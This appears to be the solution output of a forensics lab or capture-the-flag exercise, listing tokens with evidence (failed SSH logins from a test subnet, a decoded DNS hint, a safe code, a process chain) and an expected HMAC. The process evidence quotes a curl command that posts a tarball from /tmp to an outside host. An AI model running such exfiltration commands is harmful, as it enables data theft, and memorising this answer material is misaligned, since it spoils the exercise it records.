TOKEN[KEYPAD]=16265
EVIDENCE[KEYPAD].TOP24=198.18.0.0/24
EVIDENCE[KEYPAD].COUNT=65
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:23Z lab1 sshd[2273]: Failed password for svc from 198.18.0.253 port 48014 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=lines
EVIDENCE[DNS].KEY=hint3
EVIDENCE[DNS].DECODED_LINE=Signals converge in the anchor if you read between lines.
TOKEN[SAFE]=18-8-26
EVIDENCE[SAFE].MATCH=SAFE{18-8-26}
EVIDENCE[SAFE].CHECK=18+8=26
TOKEN[PID]=219
EVIDENCE[PID].PATH=[211->214->215->219]
EVIDENCE[PID].CMD="sh -c 'curl -X POST http://198.51.100.33/upload -d @/tmp/x.tgz'"
FINAL_GATE=PENDING
MSG=msc-group-07|lines-16265-219-18-8-26
EXPECTED_HMAC=c719a21479a756ff780b7e63fc2dd969f46b795e09aa940fbc5a376352f59241